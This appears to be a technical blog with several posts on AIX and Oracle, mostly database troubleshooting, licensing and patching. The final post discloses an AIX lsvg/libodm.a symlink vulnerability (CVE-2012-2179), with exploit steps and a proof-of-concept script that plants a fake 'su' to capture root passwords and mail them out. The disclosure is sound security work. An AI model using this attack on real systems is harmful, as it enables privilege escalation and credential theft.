pvproc+019000  100*ble      ACTIVE 06400D8 07700C8 0000000848B32480   0 0001

[..]
IDENTIFIER. uid        :00000064  ........... suid       :00000064
........... pid        :006400D8  ........... ppid       :007700C8
........... sid        :006E0092  ........... pgrp       :006400D8
[..]
(0)> nm pvproc
Symbol Address : F1000F0A00000000
   TOC Address : 02B65540

(0)>

so as you can see UID of our “ble” system call fuzzing process was 0×64 (or in 100 if you are uncomfortable with hex notations). By changing value at address 0xF1000F0A00000000+0×19000 one could get root shell probably, but researching my way to do that could be very time intensive.

And sample from most recent AIX 7.1 that I was having access to:

guest@hostA:# oslevel -s
7100-00-03-1115
guest@hostA:# ./ble 766
using only sc=766

… and the system is dead:

(2)> where
pvthread+011100 STACK:
[F1000000C01E06CC]dupb+00000C (0000000030CBEE17 [??])
[F1000000C01E05DC]dupmsg+00001C (??)
[00014D70].hkey_legacy_gate+00004C ()
[0000386C]ovlya_addr_sc_flih_main+00014C ()
[kdb_get_virtual_memory] no real storage @ FFFFFFFF3FFFE60
[kdb_read_mem] no real storage @ FFFFFFFFFFF95F0

(2)>

IBM has been notified months ago, patch has been released some time ago:http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc (affects AIX 5.3, 6.1 and 7.1 plus all VIOS too). Happy patching :)

-J.

Oracle RAC SCAN is not compatibile with NAT (and thus with PCI DSS)

August 6th, 2013

Oracle Single Client Access Name (SCAN) – a single access point name for Oracle RAC instance VIPs – seems often to be problematic in environments that use NAT or have to be able with compliance regulations such as PCI DSS:

  1. section 1.3.3 – “Do not allow any direct connections inbound or outbound for traffic between the Internet and the cardholder data environment”
  2. section 1.3.8 – “Do not disclose private IP addresses and routing information to unauthorized parties. Note: Methods to obscure IP addressing may include, but are not limited to: Network Address Translation (NAT) [..]“

The problem with giving external/internal parties access to Oracle RAC database clusters basically could be defined as “Oracle SCAN incompatibility with Destination NAT/TCP proxies that are network brokers”, here’s simple successful connection example to TNS_ENTRY1 alias (served via single 1xSCAN raccluster-scan VIP and racnode1/racnode2 Oracle VIPs)

[someone@racnode1 ~]$ sqlplus doesnotexists@TNS_ENTRY1
[..]
[someone@racnode1 ~]$ grep -e nnftrne: -e niotns: -e nsc2addr: sqlnet_1696.trc
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:527] niotns: entry
(1002018528) [06-AUG-2013 09:58:30:527] niotns: niotns: setting up interrupt handler...
(1002018528) [06-AUG-2013 09:58:30:527] niotns: Not trying to enable dead connection detection.
(1002018528) [06-AUG-2013 09:58:30:528] niotns: Calling address: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=raccluster-scan)(PORT=1521))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone))))
(1002018528) [06-AUG-2013 09:58:30:529] nsc2addr: (DESCRIPTION=(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone)))(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.43)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:537] nsc2addr: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.42)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:572] niotns: niotns: passing ns handle back up...
(1002018528) [06-AUG-2013 09:58:30:572] niotns: exit
[someone@racnode1 ~]$

As you can see from the above example the following is happening:
a) client is connecting via TCP/1521 to raccluster-scan
b) SCAN listener on raccluster-scan redirects – via TCP data – to hostname of the least loaded Oracle VIP (!)
c) client spawns a new connection directly to the Oracle VIP on TCP/1521 (!!)

The main problem is that when you have DNAT defined with single TCP port redirection that looks like this some Oracle client –TCP port 33333 –> DNAT/proxy_redirection –> Oracle SCAN VIP, this is not going to work because Oracle SCAN listener will redirect “some Oracle client” to Oracle VIP TCP/1521. This will fail in 1 out of 3 ways:

  1. failure scenario1: client might fail to resolve hostname using it’s own DNS
  2. failure scenario2: client might succeed DNS hostname resolution of OracleVIPX resolution but is going to be unable to reach the private VIP address via IP routing because routers/default gateway won’t know how to route to the destination (e..g client is coming from different organization, internet, etc)
  3. failure scenario3: client might succeed DNS hostname resolution, might even be able to route to the the OracleVIPX IP is, but there is firewall somewhere in between (e.g. on the same box that is doing DNAT/TCP proxy) blocking “some client” to reach directly OracleVIPX on TCP/1521

There are several solutions to this problem:
1) don’t use Oracle SCAN simple name but provide long TNS conneciton string with a number of NAT-ted/proxied TCP ports defined (every Oracle RAC node VIP should have its own NATTed/proxied TCP port for failover purposes – Oracle client is responsible for load balancing and failovering Oracle connections)
- or -
2) implement some kind of highly available TCP proxy that intelligently routes Oracle traffic to healthy RAC instances (e.g. HAproxy if you really have clients that support only short Oracle hostnames)
- or -
3) do tricks on external-facing DNS name servers (or locally on clients by placing entries on /etc/hosts) by spoofing internal host names as proxy one, but you will need 1:1 ratio of external to internal IPs to meet this goal (remember each Oracle VIP serves connections on port 1521!)
- or -
4) THE SIMPLEST ONE: do not use NAT and allow direct traffic on firewall, as NAT is evil :)

-J.

gv$dataguard_stats is buggy even on most recent 11.2.0.3.x PSUs

August 6th, 2013

Oracle introduced a new RAC-enabled view for DataGuard named gv$dataguard_stats probably starting with 11.2. However this view returns false information when queried on RAC standby node where MRP0 is not running, sample:

1st instance of standby RAC with MRP0 running:

SQL> select name,value from v$dataguard_stats;

NAME                           VALUE
------------------------------ --------------------
transport lag                  +00 00:00:00
apply lag                      +00 00:00:00
apply finish time              +00 00:00:00.000
estimated startup time         18

SQL> select name,value from gv$dataguard_stats;

NAME                           VALUE
------------------------------ --------------------
transport lag                  +00 00:00:00
apply lag                      +00 00:00:00
apply finish time              +00 00:00:00.000
estimated startup time         18
transport lag                  +00 00:00:00
apply lag                      +00 00:21:56
apply finish time              +00 00:00:41.526
estimated startup time         29

8 rows selected.

SQL>

According to this gv$dataguard_stats output there lag is 0s on 1st node (itself) and 21mins (time since when MRP0 has been relocated from 2nd node to 1st one) – this is wrong, because when you ask 2nd RAC instance for its local view of DataGuard apply lag you will see 0s.

SQL> select name,value from v$dataguard_stats;

NAME                             VALUE
-------------------------------- ------------------------------
transport lag                    +00 00:00:00
apply lag                        +00 00:00:00
apply finish time                +00 00:00:00.000
estimated startup time           29

SQL>

This inconsistency has been reported to Oracle in SR 3-6005743051: inconsistent gv$dataguard_stats on RAC standby. They did not register bug (even for docs) but returned with the following clarification:

the rows “apply lag time”, “apply finish time” and “estimated startup time” are relevant only for the applying instance. You are allowed to send log files to several instances – in such a case “transport lag” is relevant for all receiving instances.

This has certain repercussions as if you want to monitor standby lag properly – you will need to locate first the MRP0 process and then query this instance via dedicated connection for v$dataguard_stats. Doing shortcuts by using gv$dataguard_stats might return false results. Another question is why such (buggy in my opinion) view has been introduced at all if it represents no value.

-J.

Oracle Database 12.1c released. Licensing gotchas

June 26th, 2013

Accroding to Oracle® Database Licensing Information 12c Release 1 (12.1) there are some gotchas but also features which seemed pretty reasonable to be included in “basic” Enterprise Edition. The most interesting list for me is as follows:

  • Multitenant (CDB/PDB stuff) is additional paid option.
  • ILM/Heat Maps/Automatic Data Optimization belong to Advanced Compression Option
  • DataGuard Far Sync (semi bunker-site like SRDF/A* in EMC Symmetrix/VMAX solution) is licensed as follows: Far sync instances are part of the Oracle Active Data Guard Far Sync feature, which requires an Oracle Active Data Guard license. (..) A far sync instance consumes very little disk and processing resources, yet provides the ability to failover to a terminal destination with zero data loss, as well as offload the primary database of other types of overhead (for example, redo transport). You would guess they charge additionally for the number of cores on the lightweight (in terms of storage capacity and CPU) proxy instance, WRONG! Here is is stated that The far sync instance can be installed and used on a server different from the server where the Oracle Database is installed and used. It is not necessary to obtain a separate license for the server running the far sync instance.
  • Oracle Flex ASM and Oracle Flex Cluster – this is a mystery to me
  • Oracle Clusterware may be used to protect any application (restarting or failing over the application in the event of a failure) on any server, free of charge. Oracle will provide support for Clusterware only if the server is running an Oracle product, which may include Oracle Linux or Oracle Solaris, that is also under Oracle support.
  • There is also interesting statement: As of the release of Oracle Database 12c, network encryption (native network encryption and SSL/TLS) and strong authentication services (Kerberos, PKI, and RADIUS) are no longer part of Oracle Advanced Security and are available in all licensed editions of the Oracle database.- Finally! No excuses of not encrypting your sensitive connections! Wait… yeah, it means more CPU usage especially on the (Oracle) CPU-licensed side ;)

Part 2: Oracle SecureFile LOB is better than BasicFile, isn’t it?

June 18th, 2013

So we start an example from real life of using SecureFiles (without deduplication and without encryption) on large scale system (say no-no to a “laptop database” tests) version Oracle non-RAC 11.2.0.2.3 (yup, a pretty old release but the DB has been already migrated since gathering this info):

primary:sys@XXXX> desc YYYYYYYY.magic_table;
 Name                                                  Null?    Type
[..]
 HEADERS                                                        BLOB
 PAYLOAD                                                        BLOB

primary:sys@XXXX>
primary:sys@XXXX> select num_rows, blocks, AVG_ROW_LEN from dba_tables  where table_name='MAGIC_TABLE';

  NUM_ROWS     BLOCKS AVG_ROW_LEN
---------- ---------- -----------
   3791737     891649         204

The table is on 8kB tablespace, so our MAGIC_TABLE with 2 LOB columns is taking ~ 891649*8192/1024/1024/1024 =~ 6.8GB. We verify our math to real usage as shown by dba_segments:

primary:sys@XXXX> select bytes/1024/1024/1024 mb from dba_segments where segment_name='MAGIC_TABLE';

        MB
----------
    6,9375

The value is pretty close to the standard Oracle theory, so we are ok so far. We proceed with analysis what uses space in that table (we are going to concentrate on single LOB for PAYLOAD column for simplicity):

primary:sys@XXXX> SELECT CASE WHEN DBMS_LOB.GETLENGTH(PAYLOAD) > 3964 THEN 'Out-of-line' ELSE 'Inline' END x, COUNT(*) FROM YYYYYYYY.magic_table GROUP BY  CASE WHEN BMS_LOB.GETLENGTH(PAYLOAD) > 3964 THEN 'Out-of-line' ELSE 'Inline' END; 

X             COUNT(*)
----------- ----------
Inline         3100800
Out-of-line     732826

primary:sys@XXXX>

FACT1: so 24% of rows have PAYLOAD LOB stored out-of-line, out-of-line probably means different place, let’s check it.

primary:sys@XXXX> SELECT table_name, column_name, segment_name, round(a.bytes/1024/1024,1) mb FROM dba_segments a
JOIN dba_lobs b USING (owner, segment_name) WHERE b.table_name LIKE 'MAGIC_TABLE%';

TABLE_NAME                     COLUMN_NAME          SEGMENT_NAME                           MB
------------------------------ -------------------- ------------------------------ ----------
MAGIC_TABLE                    HEADERS              SYS_LOB0000099004C00007$$              ,1
MAGIC_TABLE                    PAYLOAD              SYS_LOB0000099004C00008$$         1769095

primary:sys@XXXX>

FACT2: this 24% of rows takes 1769095 MB (sic!) which means 1.72TB consumed for just 1/4 of rows.

primary:sys@XXXX> select table_name, tablespace_name, chunk, pctversion, retention, in_row, securefile, retention from dba_lobs where segment_name = 'SYS_LOB0000099004C00008$$';

TABLE_NAME                     TABLESPACE_NAME                     CHUNK PCTVERSION  RETENTION IN_ SEC  RETENTION
------------------------------ ------------------------------ ---------- ---------- ---------- --- --- ----------
MAGIC_TABLE                    LOB4K                                4096                       YES YES

primary:sys@XXXX>
primary:sys@XXXX>

FACT3: 24% of rows have data stored in separate tablespace dedicated for LOBs with 4kB blocksize.

primary:sys@XXXX> SELECT CASE
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) < 3964  THEN '< 4kB'
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) < 6*1024 THEN '<6kB'
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) < 7*1024 THEN '<7kB'
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) < 8*1024 THEN '<8kB'
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) <16*1024 THEN '<16kB'
  ELSE 'even bigger'
  END x,
  COUNT(*) cnt
FROM YYYYYYYY.magic_table GROUP BY CASE
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) < 3964  THEN '<4kB'
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) < 6*1024 THEN '<6kB'
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) < 7*1024 THEN '<7kB'
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) < 8*1024 THEN '<8kB'
  WHEN DBMS_LOB.GETLENGTH(PAYLOAD) <16*1024 THEN '<16kB'
  ELSE 'even bigger'
  END;   2    3    4    5    6    7    8    9   10   11   12   13   14   15   16   17  

X                  CNT
----------- ----------
<7kB                76
<4kB           3215841
<6kB            701916

primary:sys@XXXX>

We can double-check Oracle on it’s math here. There is not a single row in that table that has LOB entry bigger than 7kB, still everything is stored out-of-line (technically bigger than something like 3600-3900 bytes which is max size for inline LOBs) in LOB segment named SYS_LOB0000099004C00008$$ is taking 1769095 MB (sick!).
So actually 701916+76 rows potentially consume 1769095 MB in datafiles, which gives us 2.5MB of waste per row. This table is really heavy duty OLTP table which means really lots of INSERT/UPDATE/DELETE concurrent stuff, I’m not even sure if the application responsible, is doing updates against they PAYLOAD column, from my analysis it is just inserts row once (with LOB via JDBC) and sometime later deletes it. All I can say about the application in scope is the fact that it is “database interdependent”.

Let’s now calculate theory behind space calculation (A.K.A what should be really used if there would be no overhead). Space that should be used for PAYLOAD column stored in LOBSEGMENT should be:

  • 3215841 rows stored inside tablespace with the rest of data; table segment for MAGIC_TABLE already stores 6.7GB which contains data for those 3215841 rows, so we can skip it
  • (701916+76) rows stored in separated tablespace LOB4K, which means that for rows bigger than 3600..3900 this translates to at least 1 CHUNK (4kB) and maximum up to 2 CHUNKs (8kB) because we do not have anything bigger than 7kB; we can assume even worse scenario that single CHUNK(4kB) would require up to 2 blocks in 4kB tablespace due to some overheads. So even in the worst case we have (701916+76)*4096*2/1024/1024/1024 =~ 5.36GB

So what we really have is 1727 GB used to store 5.36GB. Closing this part i would like to give you an idea how hard SecureFile LOB processing is for Oracle, they seem to be struggling with it for couple years. The list of bugs for 11.x series include:

  • Bug 14849553 : MOVE LOB SLOWER FOR SECURE FILES THAN BASIC FILES
  • Bug 13593640 : DATABASE IS SLOW DUE TO BUFFER BUSY WAITS ON SECUREFILE FOR INSERTS
  • Bug 10197852 : SLOW PERFORMANCE ACCESSING SECUREFILE BLOBS WITH XA CONNECTIONS
  • Bug 9792464 : DEGRADED PERFORMANCE INSERTING LARGE BLOB WITHIN AN XA TRANSACTION
  • Bug 13005760 : BUG:EXCESSIVE ENQ TX-CONTENTION WAIT ON SECUREFILE
  • Bug 8620054 : LOBS WASTE STORAGE USING LOB TYPE DISABLE STORAGE IN ROW
  • Bug 14723894 : SECUREFILE BLOB NOT REUSING SPACE
  • Bug 8487668: RETENTION NONE NOT HONORED CORRECTLY IN SECUREFILES
  • Bug 10097920: SPACE NOT RELEASED USING SECUREFILES
  • Bug 8603465: AGGRESSIVE ALLOCATION OF SPACE IN SECUREFILES
  • Bug 12582664: DEDUPLICATION WITH SECUREFILES NOT WORKING AS EXPECTED
  • Bug 12588744: SECUREFILE WASTE STORAGE WHEN SPECIFY INITIAL EXTENT
  • Bug 12656535: ORA-1555 DURING DIRECT PATH READ OF SECUREFILE LOB
  • Bug 12662040: SECUREFILE LOB SEGMENT KEEPS GROWING IN CASE OF PLENTY OF FREE SPACE

I’m certain you could find even more. Even with the most recent 11.2.0.3.x SecureFilles are still being patched, as they fixed bug 14176879 in 11.2.0.3.6 in Critical Patch Updates April 2013. Bug 14176879 stands for “Extensive growth of Securefiles segments undergoing updates”.

To make it even more appealing to use SecureFiles (irony intended), here’s the next real the BIG THING: in section “Using ALTER TABLE with SecureFiles LOBs” in official documentation, it is written: “Note that the SHRINK option is not supported for SecureFiles LOBs”. Yeah, now you can scream ;)

Part 1: Oracle SecureFile LOB is better than BasicFile, isn’t it?

June 6th, 2013

According to Oracle Technical Marketing SecureFiles are superior in every way to the older BasicFile LOB implementation. Part1 of this articles is going to try to prove it for strictly OLTP like workloads (having LOB column as requirement for application that is doing a lot of heavy/duty short & quick transaction requiring to store data that VARCHAR2 type is not capable of). This series is not going to concentrate on the LOBs used for anything bigger than 5300 bytes. We also want to take profit from the LOB inline storage option that stores LOB data together with the table data. The benchmarks were performed on 2 sockets 8 cores Intel Xeon box running Oracle 11.2.0.3.5 with some local RAID1 storage. Before each iteration shared pool and buffer cache were flushed, log switch forced (BTW: DB running without archive redo logs), dedicated tablespaces recreated, workload has been parallel (like in OLTP) using 8 jobs hitting single table creating (intended) contention, each run has been run at least 3 times to guarantee at least some kind of “repeatability”. The table has not been partitioned and it looked like this:

create table t_blob ( id number primary key, l1 clob ) tablespace blobs
lob ( l1 ) store as &blob_type (
tablespace blobs &inrow storage in row chunk &chunk &cache &logging
)
;

there are several variables set like this:

  • &inrow – always “enable” for purposes of this test
  • &chunk – always set for 4k for purposes of this test
  • &cache – always set to CACHE
  • &logging – always set
  • &blob_type – securefile, basicfile
  • tablespace – the tested values were 4k and 8k, each time setting db_buffer_cache for the appriopiate buffer to 1.5GB
  • payload for LOB data – always generated randomly using dbms_random package, with with length of minimum from 300 bytes (incremented with step of 2000 bytes) up to 5300 bytes (incremented also by 2000)

The results are below, first space efficiency BasicFile vs SecureFile:

Second, elapsed time of execution comparing BasicFile VS SecureFile:

But that’s not the end, stay tuned for part 2 where I’ll show that the world is not so beautiful as it looks like :)

-J.

Oracle online patching for bug 13817131 (backport for ORA-7445 near ksfqfcrx()+X during RMAN backups)

October 3rd, 2012

Oracle 11.2.0.3.x seems to be affected sometimes (the bug manifest itself only in highly utilized environments as per my observations) by ORA-7445 during RMAN backups. The first symptoms are like this in the RMAN log:
channel t1: starting piece 1 at 17-SEP-12
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03009: failure of backup command on t1 channel at 09/17/2012 16:01:23
RMAN-10038: database session for channel t1 terminated unexpectedly

The alert log contains information that incident has been registered and the most interesting entry is this:
ORA-07445: exception encountered: core dump [ksfqfcrx()+1143] [SIGSEGV] [ADDR:0x8] [PC:0xA3E2E3] [Address not mapped to object] []

Starting from this point, sooner or later all RMAN backups are going to fail. My observation is that this is only matter of time. RAC gives some additional headroom, because one can switch making backups to next node, but please be advised that as this is some kind of memory corruption going on, this will also happen on next nodes. You need to patch it.

The GDB backtrace shows excactly the function

(gdb) where
#0 0x0000003513630285 in raise () from /lib64/libc.so.6
#1 0x0000003513631d30 in abort () from /lib64/libc.so.6
#2 0x0000000008130445 in skgdbgcra ()
#3 0x00000000067a67f1 in sksdbgcra ()
#4 0x0000000004977828 in ksdbgcra ()
#5 0x000000000679e3a5 in ssexhd ()
#6 <signal handler called>
#7 0x0000000000a3e2e3 in ksfqfcrx ()
#8 0x0000000007018463 in krbbOpenOutput ()
#9 0x000000000702afe7 in krbbpcint ()
#10 0x000000000702e393 in krbbpc ()
#11 0x0000000008a47cea in krbibpc ()
#12 0x00000000093f8131 in pevm_icd_call_common ()
#13 0x00000000093ed460 in pfrinstr_ICAL ()
#14 0x00000000093f10b9 in pfrrun_no_tool ()
#15 0x00000000093ef78d in pfrrun ()
[..]
#31 0x0000000001dc0d14 in ssthrdmain ()
#32 0x0000000000a0b271 in main ()
(gdb) ... serveral "up" cmds to get to the #6 stack frame
(gdb) info registers rax r12
rax 0x0 0
r12 0x7fd3ac78bf20 140547108421408
(gdb)
(gdb) disas
[..]
0x0000000000a3e2d6 <ksfqfcrx+1130>: callq 0x4838ada <ksfq_ibuf>
0x0000000000a3e2db <ksfqfcrx+1135>: mov 0xcd0(%r12),%rax <--- r12</strong>
0x0000000000a3e2e3 <ksfqfcrx+1143>: orl $0x4,0x8(%rax) <--- crash, due to %rax being 0 and the instruction is addres at $rax register + 8 (SEG FAULT)
0x0000000000a3e2e7 <ksfqfcrx+1147>: jmpq 0xa3e0bc <ksfqfcrx+592>

More or less the issue is documented under Oracle Support note 1482775.1 and the only workaround is to upgrade to 12.1 or 11.2.0.4 which is a little joke (we all know that 12.1 is going to be such great database version that it won’t have even an single bug… all is fixed in 12.1 ;) ). Now in my opinion one will have several options:

  1. you agree to loose backups of mission critical production envs (change RMAN ARCHIVELOG POLICY to NONE?) or fallback to backups taken on DataGuard standby (delete force archivelog is your friend… or enemy actually ;) )
  2. fallback to remaining RAC nodes and restart one of the RAC nodes… (restart of instances seems to avoid the problem for sometime)
  3. do nothing and have downtime (due to ARCH stuck problem, due to FRA filling up)
  4. request a backport for the bug mentioned in in 1482775.1

We’ve went with options b + d. Later I’ve raised escalation call for the case we’ve raised initially. Several days later we had patch ready to be applied, the nice thing about it (patch 13817131) was that it is possible to apply it completely in online mode even on RAC (no need to shutdown anything), just live memory patching! Here are the details from the lab:

[oracle@labr2 13817131]$ opatch apply online -connectString ORCL2:::labr1,ORCL1:::labr2
Oracle Interim Patch Installer version 11.2.0.3.0
Copyright (c) 2012, Oracle Corporation.  All rights reserved.

Oracle Home       : /u01/app/oracle/product/11.2.0/dbhome_1
Central Inventory : /u01/app/oraInventory
   from           : /u01/app/oracle/product/11.2.0/dbhome_1/oraInst.loc
OPatch version    : 11.2.0.3.0
OUI version       : 11.2.0.3.0
Log file location : /u01/app/oracle/product/11.2.0/dbhome_1/cfgtoollogs/opatch/13817131_Sep_27_2012_12_55_35/apply2012-09-27_12-55-35PM_1.log

The patch should be applied/rolled back in '-all_nodes' mode only.
Converting the RAC mode to '-all_nodes' mode.
Applying interim patch '13817131' to OH '/u01/app/oracle/product/11.2.0/dbhome_1'
Verifying environment and performing prerequisite checks...
All checks passed.
[..]
Backing up files...

Patching component oracle.rdbms, 11.2.0.3.0...
Installing and enabling the online patch 'bug13817131.pch', on database 'ORCL1'.

Verifying the update...

Patching in all-node mode.

Updating nodes 'labr1'
   Apply-related files are:
     FP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt"
     DP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt"
     MP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/make_cmds.txt"
     RC = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/remote_cmds.txt"

Instantiating the file "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt.instantiated" by replacing $ORACLE_HOME in "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt" with actual path.
Propagating files to remote nodes...
Instantiating the file "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt.instantiated" by replacing $ORACLE_HOME in "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt" with actual path.
Propagating directories to remote nodes...
Installing and enabling the online patch 'bug13817131.pch', on database 'ORCL2' on node 'labr1'.

Patch 13817131 successfully applied
Log file location: /u01/app/oracle/product/11.2.0/dbhome_1/cfgtoollogs/opatch/13817131_Sep_27_2012_12_55_35/apply2012-09-27_12-55-35PM_1.log

OPatch succeeded.
[oracle@labr2 13817131]$

Meanwhile in the alertlog
Thu Sep 27 12:56:09 2012
Patch file bug13817131.pch is out of sync with oracle binary; performing fixup
Patch file bug13817131.pch has been synced with oracle binary
Patch bug13817131.pch Installed – Update #1
Patch bug13817131.pch Enabled – Update #2
Thu Sep 27 12:56:11 2012
Online patch bug13817131.pch has been installed
Online patch bug13817131.pch has been enabled

Technical details follow, as you can see the dynamic library is being added without any interruption to running binaries. Probably some functions are also being redirected to this dynamic library to:

[root@labr2 ~]# ps -ef | grep pmon
oracle    2618     1  0 11:29 ?        00:00:01 asm_pmon_+ASM1
oracle    3013     1  0 11:30 ?        00:00:01 ora_pmon_ORCL1
root      4947  3844  0 13:02 pts/0    00:00:00 grep pmon
[root@labr2 ~]# lsof -p 3013 |grep bug
oracle  3013 oracle  mem    REG             202,17    217221 1183112 /u01/app/oracle/product/11.2.0/dbhome_1/hpatch/bug13817131.so
[root@labr2 ~]#
[root@labr2 ~]# pmap -d 3013|grep bug
00007fcb51e8c000     168 r-x-- 0000000000000000 0ca:00011 bug13817131.so
00007fcb51eb6000    1020 ----- 000000000002a000 0ca:00011 bug13817131.so
00007fcb51fb5000      12 rwx-- 0000000000029000 0ca:00011 bug13817131.so
[root@labr2 ~]#

CVE-2012-2179: lsvg(1) AIX61/71 – libodm.a vulnerable due to the ODMERR env

July 12th, 2012

This is new local attack for at least AIX 6.1 / 7.1 or at least there were enough time for anyone seriously considering security to patch their systems (IBM released info on 2012-06-22, today is 2012-07-12) … this is typical arbitrary file overwrite symlink vulnerability due to libodm.a bug giving local root. libodm.a (in this case used by SUID lsvg) performs an getenv(“ODMERR”) – undocumented env variable – which if is set triggers the debug code to dump the contents of debug log message generated in runtime by libodm.a to always the same file – ODMTRACE0 (or ODMTRACE1, etc) in current runtime directory (seems to be related to getcwd()). Proof:

guest@XXX:# oslevel -s
7100-00-03-1115
guest@XXX:# export ODMERR=1
guest@XXX:# ln -s /etc/ssh/sshrc ODMTRACE0
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 ->
/etc/ssh/sshrc
guest@XXX:# umask 0000
guest@XXX:# lsvg
rootvg
appvg
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 ->
/etc/ssh/sshrc
guest@XXX:# head -3 ODMTRACE0
 __odm_initfini_init: Start
 __odm_initfini_init: End
 odm_set_path: Start
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff          7332 Dec 22 05:42 /etc/ssh/sshrc
guest@XXX:#
guest@XXX:# vi /etc/ssh/sshrc
# a lot of typing
guest@XXX:# cat /etc/ssh/sshrc
#!/bin/sh
# proof of concept for lsvg(1) AIX61/71 0-day exploit, 22/12/2011, vnull
#
# /etc/environment usually sets PATH from scratch so we have to
# cheat via ~/.profile which is read by user's shell at later stage
#

mkdir /tmp/$$
cat > /tmp/$$/su << EOF
#!/bin/bash
#this would be a su backdoor sendming email or transmiting pw over dns...
echo -e "root's Password: \c"
stty -echo
read PW
stty echo
echo
#echo your PW is \$PW
echo \$USER \$HOSTNAME \$PW | mail -s cookie your@email.com >
/dev/null 2>&1
echo '[compat]: 3004-300 You entered an invalid login name or password.'
echo
echo '3004-501 Cannot su to "root" : Authentication is denied.'
rm -f /tmp/$$/su
exit 0
EOF
chmod 755 /tmp/$$/su

cat >> ~/.profile << EOF
export PATH=/tmp/$$:$PATH
EOF

guest@XXX:#

How does it work? If the above attack is performed, and somebody else logs in using ssh remotely (root or just simple user), then /etc/ssh/sshrc contents are executed (by sshd) with his privilege level. In this case PATH is altered to hijack “su” executions and obtain potentially password. This could be also adapted e.g. to catch “sudo” password too.

Potential workaround: drop all SUIDs from all binaries linked to libodm.a (yes i find it kind of hard due to need of dropping even SUID from lsvg, which may break a lot of IBM/3rd software, especially some agents using commands such as lsvg to monitoring stuff.

Fixed via CVE-2012-2179, more info here http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc

Still IBM AIX doesn’t come with proper hardened protection against /tmp races as mentioned in previous blog entry about CVE-2011-1384. Timeline: almost 180 days to fix for IBM.

BTW: This proof of concept could be easily adapted to give instant root (as you can create any file that does not exists), but I’m not going to disclose weaponized versions.

-J.